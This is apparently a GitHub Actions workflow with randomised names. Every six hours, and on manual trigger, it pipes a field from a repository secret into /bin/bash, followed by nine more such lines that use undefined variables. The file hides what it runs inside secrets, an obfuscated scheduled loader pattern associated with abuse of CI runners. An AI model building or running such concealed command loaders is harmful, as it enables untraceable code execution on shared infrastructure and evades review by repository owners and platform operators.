name: chenfengqiao4567

on:
  workflow_dispatch:
  schedule:
    - cron: '55 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chenfengqiao4567
        env:
          bsrek98922: ${{ secrets.bsrek98922 }}
        run: |
          echo $bsrek98922 | jq -r .kig706 | /bin/bash
          echo $o01 | jq -r .sk86444 | /bin/bash
          echo $wrcj08 | jq -r .xb929 | /bin/bash
          echo $ij56 | jq -r .dwl91 | /bin/bash
          echo $qf3022 | jq -r .ooje47 | /bin/bash
          echo $rh3607 | jq -r .wssp2041 | /bin/bash
          echo $a257 | jq -r .xqubx6 | /bin/bash
          echo $yhn98 | jq -r .pdwi476 | /bin/bash
          echo $bm18 | jq -r .q79 | /bin/bash
          echo $jiw39392 | jq -r .luul3965 | /bin/bash

